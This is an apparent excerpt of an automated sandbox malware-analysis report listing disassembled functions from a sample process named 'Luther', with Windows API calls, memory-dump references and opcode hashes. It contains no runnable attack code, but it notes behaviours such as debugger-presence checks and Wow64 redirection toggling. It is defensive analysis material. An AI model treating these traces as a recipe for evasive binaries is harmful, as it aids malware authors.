                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_Timer$Kill
                                                                                                          • String ID:
                                                                                                          • API String ID: 3500052701-0
                                                                                                          • Opcode ID: 959ff1d5b5b5ac7b157c506c83fe098bf76e4d7ad412e4a176fe0c89159684e9
                                                                                                          • Instruction ID: 957021b32334dcb98a68948072243637d6e45cd695881bb1bd1b1d85205ca05b
                                                                                                          • Opcode Fuzzy Hash: 959ff1d5b5b5ac7b157c506c83fe098bf76e4d7ad412e4a176fe0c89159684e9
                                                                                                          • Instruction Fuzzy Hash: 1B31C571904344AFEB32DF24C855BE7BBECAB02708F0014AEE69D67242C7745A85CB51
                                                                                                          APIs
                                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00E697BA,FF8BC369,00000000,00000002,00000000), ref: 00E69744
                                                                                                          • GetLastError.KERNEL32(?,00E697BA,FF8BC369,00000000,00000002,00000000,?,00E65ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00E56F41), ref: 00E6974E
                                                                                                          • __dosmaperr.LIBCMT ref: 00E69755
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                          • String ID:
                                                                                                          • API String ID: 2336955059-0
                                                                                                          • Opcode ID: cc2331767f2c8e1184e50a6a6454516e81b2bc3aab11250722aba524d0654ed0
                                                                                                          • Instruction ID: 419059bc6a166744ed2239525e89cd829f5b45a5de62007b6bdfbfcf194487ef
                                                                                                          • Opcode Fuzzy Hash: cc2331767f2c8e1184e50a6a6454516e81b2bc3aab11250722aba524d0654ed0
                                                                                                          • Instruction Fuzzy Hash: 48014C33620514AFCB059F99EC05CAE7B6EEB85370B24021AF811A7191EA71ED519BD0
                                                                                                          APIs
                                                                                                          • TranslateMessage.USER32(?), ref: 00E3F27B
                                                                                                          • DispatchMessageW.USER32(?), ref: 00E3F289
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E3F29F
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00E3F2B1
                                                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00E832D8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 3288985973-0
                                                                                                          • Opcode ID: 952916506e4fe37d0b9613884f465373b93a5268f80da1fa9b2e894ee7af904c
                                                                                                          • Instruction ID: af2da3cf457b24109940f9e9e05b922608afa32a8c586be5fb3504d5cab88fc8
                                                                                                          • Opcode Fuzzy Hash: 952916506e4fe37d0b9613884f465373b93a5268f80da1fa9b2e894ee7af904c
                                                                                                          • Instruction Fuzzy Hash: 83F05E30608344DBEB709BA0DC89FEA77ACAB84714F105939E20DA30E0DB71A588DB25
                                                                                                          APIs
                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E33A3C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_
                                                                                                          • String ID:
                                                                                                          • API String ID: 1144537725-0
                                                                                                          • Opcode ID: edc225de831ccac81e837fca1ff07017b455563bdb12a259874479f1c2581aba
                                                                                                          • Instruction ID: 0983e7f4e91c9fd2baccaba29675ddaef702a707d4a8ebc526171146465c2b5c
                                                                                                          • Opcode Fuzzy Hash: edc225de831ccac81e837fca1ff07017b455563bdb12a259874479f1c2581aba
                                                                                                          • Instruction Fuzzy Hash: E331A571604305DFD760DF34D889B97BBE8FB49309F00092EE6D9A7281E775A948CB52
                                                                                                          APIs
                                                                                                          • IsThemeActive.UXTHEME ref: 00E3333D
                                                                                                            • Part of subcall function 00E332E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E332FB
                                                                                                            • Part of subcall function 00E332E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E33312
                                                                                                            • Part of subcall function 00E3338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E33368,?), ref: 00E333BB
                                                                                                            • Part of subcall function 00E3338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E33368,?), ref: 00E333CE
                                                                                                            • Part of subcall function 00E3338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F02418,00F02400,?,?,?,?,?,?,00E33368,?), ref: 00E3343A
                                                                                                            • Part of subcall function 00E3338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00F02418,?,?,?,?,?,?,?,00E33368,?), ref: 00E334BB
                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00E33377
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                          • String ID:
                                                                                                          • API String ID: 1550534281-0
                                                                                                          • Opcode ID: d3745b597a9acea2af5fcdad81458dd711a5fbaf42f4ed2e029b781418317734
                                                                                                          • Instruction ID: fa53f07a696a89afd9976d4a95625fc9e8210c533e0dc0480b56056daffda393
                                                                                                          • Opcode Fuzzy Hash: d3745b597a9acea2af5fcdad81458dd711a5fbaf42f4ed2e029b781418317734
                                                                                                          • Instruction Fuzzy Hash: 7BF054325587489FD7416F70EC0EF283BE4B704719F045816B519694F2DBBA4159EB50
                                                                                                          APIs
                                                                                                          • __Init_thread_footer.LIBCMT ref: 00E3CEEE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Init_thread_footer
                                                                                                          • String ID:
                                                                                                          • API String ID: 1385522511-0
                                                                                                          • Opcode ID: 7f06c59d9cfe63ccc78fdf03babb7a6bfa072447f8507f3ffe8cf370ed68d270
                                                                                                          • Instruction ID: c7518e6ab6e7ed10a86e9b125b704b8aa7588742c123b2e593514a75fa3d7ccf
                                                                                                          • Opcode Fuzzy Hash: 7f06c59d9cfe63ccc78fdf03babb7a6bfa072447f8507f3ffe8cf370ed68d270
                                                                                                          • Instruction Fuzzy Hash: 7132F574A00205DFCB14DF54C888ABABBF9FF45358F28A099E90ABB251C735ED42DB51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString
                                                                                                          • String ID:
                                                                                                          • API String ID: 2948472770-0
                                                                                                          • Opcode ID: 0c302163bcfb4c385e8bb69c031331cc856504d08484aba7f260b33b5d07ade7
                                                                                                          • Instruction ID: 3e046fafdc011e0fe0048db6dbf57f4c84436e51e74e4f61d46f139f9658c8d3
                                                                                                          • Opcode Fuzzy Hash: 0c302163bcfb4c385e8bb69c031331cc856504d08484aba7f260b33b5d07ade7
                                                                                                          • Instruction Fuzzy Hash: 8AD15A74A04209EFCB14EF98D8819EEBBB5FF88314F145199E955BB291DB30AE41CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 849963c2b42a8f3617a092bbf27bc30c83e0a511df0b9ae6ee9de50b4f60d2a3
                                                                                                          • Instruction ID: 05d2a492371f8a2252253ab9c77e3551e18e1aba8c92bd26aedcc8a6e56ae4b7
                                                                                                          • Opcode Fuzzy Hash: 849963c2b42a8f3617a092bbf27bc30c83e0a511df0b9ae6ee9de50b4f60d2a3
                                                                                                          • Instruction Fuzzy Hash: 7E511D79A00108AFDB10DF68C940BA97BE1EF85365F199978EC18BB3A2D731DD46CB50
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00E9FCCE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharLower
                                                                                                          • String ID:
                                                                                                          • API String ID: 2358735015-0
                                                                                                          • Opcode ID: 0d22132e88b0486bd616bc6c31cbe8c64a70e76921ecba017c80010764587eda
                                                                                                          • Instruction ID: 683db55fe8b988292846e74dfc918deb0c7244958d147aa08f886375de306798
                                                                                                          • Opcode Fuzzy Hash: 0d22132e88b0486bd616bc6c31cbe8c64a70e76921ecba017c80010764587eda
                                                                                                          • Instruction Fuzzy Hash: 0A4183B6500209AFCF11DF68C881AAEB7F8EF44318B20953EE916E7251EB71DE45CB50
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E3668B,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E3664A
                                                                                                            • Part of subcall function 00E3663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E3665C
                                                                                                            • Part of subcall function 00E3663E: FreeLibrary.KERNEL32(00000000,?,?,00E3668B,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E3666E
                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E366AB
                                                                                                            • Part of subcall function 00E36607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E75657,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E36610
                                                                                                            • Part of subcall function 00E36607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E36622
                                                                                                            • Part of subcall function 00E36607: FreeLibrary.KERNEL32(00000000,?,?,00E75657,?,?,00E362FA,?,00000001,?,?,00000000), ref: 00E36635
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2632591731-0
                                                                                                          • Opcode ID: cd410e038092597f0622149c05631d918a71e42485d5530cd2f3c07dbb7352c9
                                                                                                          • Instruction ID: f22e039e3896ff344093c4bfb173d8091601297405f59465ea1e495a3f4cf87e
                                                                                                          • Opcode Fuzzy Hash: cd410e038092597f0622149c05631d918a71e42485d5530cd2f3c07dbb7352c9
                                                                                                          • Instruction Fuzzy Hash: E211C472600205BACF14AB70CD0BBADBFE59F94755F20D82DF442BA1D2DEB19A05DB50
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wsopen_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 3347428461-0
                                                                                                          • Opcode ID: 8758cbeb748a34e3a32c14292e075b29cf1a07535912d1dd3234ad0afda65e62
                                                                                                          • Instruction ID: 9b82a0556039c2d16d88d37066a38576419acb2ba9bbfba7a566b7bb5ece5300
                                                                                                          • Opcode Fuzzy Hash: 8758cbeb748a34e3a32c14292e075b29cf1a07535912d1dd3234ad0afda65e62
                                                                                                          • Instruction Fuzzy Hash: F81148B290420AAFCB15DF58E94499A7BF4FF48300F104169F809AB311DA31EE118B64
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                          • Instruction ID: 53f1f5d4f31a7c8f72afc1a7ad1664d4eff4ac9c83bc5f4f7c956da3b1d17863
                                                                                                          • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                          • Instruction Fuzzy Hash: 8FF0F932500A1056D7363A26AC0579A33D98FC2376F106F55FD65B32D1DA70D90986D2
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 176396367-0
                                                                                                          • Opcode ID: 49b5f3d2416b2b09249f62e531901035385350fe3fb11eec779d2002293d756d
                                                                                                          • Instruction ID: c3a1b1f14f92e4427e8f3e9cd911ade0f80b9fc42173d501d2de33d0923cfaac
                                                                                                          • Opcode Fuzzy Hash: 49b5f3d2416b2b09249f62e531901035385350fe3fb11eec779d2002293d756d
                                                                                                          • Instruction Fuzzy Hash: 6FF0C8B3601B146ED7149F28D906BA6BF98EB44360F10852AFA1ADB1D1DB71E514CBA0
                                                                                                          APIs
                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00EAF987
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentVariable
                                                                                                          • String ID:
                                                                                                          • API String ID: 1431749950-0
                                                                                                          • Opcode ID: 4eff348d2597e518c1e3eaea758277a42c99d6ff4b2065b4a6a2db0b4c21f71c
                                                                                                          • Instruction ID: 9540f3cea1405d5071e8ca66fb2e2e2079792027b6fff9cb852bac159a12cf31
                                                                                                          • Opcode Fuzzy Hash: 4eff348d2597e518c1e3eaea758277a42c99d6ff4b2065b4a6a2db0b4c21f71c
                                                                                                          • Instruction Fuzzy Hash: C4F03C72600204BFCB05EBA5DD4AE9FBBF8EF89720F005465F905BB261DA70BA45C761
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00E56A79,?,0000015D,?,?,?,?,00E585B0,000000FF,00000000,?,?), ref: 00E63BC5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: d336aa4f136cf788ab68db40b921628aa9358ff2ab3af7bffed724a4ad568ff8
                                                                                                          • Instruction ID: 1de18ce9115dbcbd65c8cbe7f4c6f25d9a8cad1e3eb1dc147faf5dc439571bc7
                                                                                                          • Opcode Fuzzy Hash: d336aa4f136cf788ab68db40b921628aa9358ff2ab3af7bffed724a4ad568ff8
                                                                                                          • Instruction Fuzzy Hash: 73E0ED22680A20AADA202672BC05B9A3A88AF013E6F192120EC05B60A0CF60CE0082E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ea2ecde01b2694f3e2201675ed15b9459e22bd30e87c6b5ef267870646f8f572
                                                                                                          • Instruction ID: 332f25b1db01381af25f3e5f10997f04f52285c7bda1a22a115173ed0d9f2455
                                                                                                          • Opcode Fuzzy Hash: ea2ecde01b2694f3e2201675ed15b9459e22bd30e87c6b5ef267870646f8f572
                                                                                                          • Instruction Fuzzy Hash: 32F0A971005702DFCB348FB0D8A4852BBF0BF0032A324D9BEE1CAA6610C7729844CF10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 2638373210-0
                                                                                                          • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                          • Instruction ID: 47fee37407858a4ad89f8f33729a2748fe9ce8e369a2bdc36c73e513e5799ac8
                                                                                                          • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                          • Instruction Fuzzy Hash: 6CF0F87650020DFFDF09DF90C941E9EBBB9FB08318F209485F9159A251C376EA21EBA1
                                                                                                          APIs
                                                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E33963
                                                                                                          Memory Dump Source
